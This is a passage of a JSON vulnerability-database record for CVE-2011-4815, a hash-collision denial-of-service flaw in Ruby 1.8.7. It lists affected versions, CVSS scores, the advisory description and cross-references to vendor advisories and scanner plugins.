"http://www.kb.cert.org/vuls/id/903934", "http://jvndb.jvn.jp/ja/contents/2012/JVNDB-2012-000066.html", "http://rhn.redhat.com/errata/RHSA-2012-0069.html", "http://jvn.jp/en/jp/JVN90615481/index.html", "http://blade.nagaokaut.ac.jp/cgi-bin/scat.rb/ruby/ruby-talk/391606", "http://www.ocert.org/advisories/ocert-2011-003.html", "http://rhn.redhat.com/errata/RHSA-2012-0070.html", "http://secunia.com/advisories/47405", "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", "http://secunia.com/advisories/47822", "https://exchange.xforce.ibmcloud.com/vulnerabilities/72020"], "cvelist": ["CVE-2011-4815"], "type": "cve", "lastseen": "2021-04-22T23:19:44", "history": [{"bulletin": {"affectedConfiguration": [], "affectedSoftware": [{"cpeName": "ruby-lang:ruby", "name": "ruby-lang ruby", "operator": "le", "version": "1.8.7-p352"}, {"cpeName": "ruby-lang:ruby", "name": "ruby-lang ruby", "operator": "eq", "version": "1.8.7-p334"}, {"cpeName": "ruby-lang:ruby", "name": "ruby-lang ruby", "operator": "eq", "version": "1.8.7-p299"}, {"cpeName": "ruby-lang:ruby", "name": "ruby-lang ruby", "operator": "eq", "version": "1.8.7-p302"}, {"cpeName": "ruby-lang:ruby", "name": "ruby-lang ruby", "operator": "eq", "version": "1.8.7-p330"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:ruby-lang:ruby:1.8.7-p299", "cpe:/a:ruby-lang:ruby:1.8.7-p330", "cpe:/a:ruby-lang:ruby:1.8.7-p302", "cpe:/a:ruby-lang:ruby:1.8.7-p352", "cpe:/a:ruby-lang:ruby:1.8.7-p334"], "cpe23": ["cpe:2.3:a:ruby-lang:ruby:1.8.7-p334:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p352:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p302:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p299:*:*:*:*:*:*:*", "cpe:2.3:a:ruby-lang:ruby:1.8.7-p330:*:*:*:*:*:*:*"], "cpeConfiguration": {}, "cvelist": ["CVE-2011-4815"], "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-20"], "description": "Ruby (aka CRuby) before 1.8.7-p357 computes hash values without restricting the ability to trigger hash collisions predictably, which allows context-dependent attackers to cause a denial of service (CPU consumption) via crafted input to an application that maintains a hash table.", "edition": 2, "enchantments": {"dependencies": {"modified": "2020-09-21T14:01:29", "references": [{"idList": ["OPENVAS:1361412562310881167", "OPENVAS:870638", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881167", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310863921"], "type": "openvas"}, {"idList": ["VU:903934"], "type": "cert"}, {"idList": ["GLSA-201412-27"], "type": "gentoo"}, {"idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"], "type": "freebsd"}, {"idList": ["JVN:90615481"], "type": "jvn"}, {"idList": ["SSV:26121", "SSV:26126"], "type": "seebug"}, {"idList": ["USN-1377-1"], "type": "ubuntu"}, {"idList": ["ELSA-2012-0070", "ELSA-2012-0069"], "type": "oraclelinux"}, {"idList": ["MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "SOLARIS11_RUBY_20120417.NASL", "CENTOS_RHSA-2012-0069.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17542.NASL", "ALA_ALAS-2012-35.NASL", "REDHAT-RHSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "FEDORA_2011-17551.NASL"], "type": "nessus"}, {"idList": ["ALAS-2012-035"], "type": "amazon"}, {"idList": ["RHSA-2012:0069", "RHSA-2012:0070"], "type": "redhat"}, {"idList": ["SECURITYVULNS:VULN:12518", "SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"], "type": "securityvulns"}, {"idList": ["CESA-2012:0069", "CESA-2012:0070"], "type": "centos"}, {"idList": ["DEBIAN:DLA-263-1:BBAC7", "DEBIAN:DLA-88-1:4DC9E"], "type": "debian"}], "rev": 2}, "score": {"modified": "2020-09-21T14:01:29", "rev": 2, "value": 5.7, "vector": "NONE"}}, "hash": "cb428228446d7da1fda2104c096bf3d02e3def41bae10ed2cf7fa7f2d8e1945f", "hashmap": [{"hash": "5bc9f799deea45f0292adcc2318fa09a", "key": "d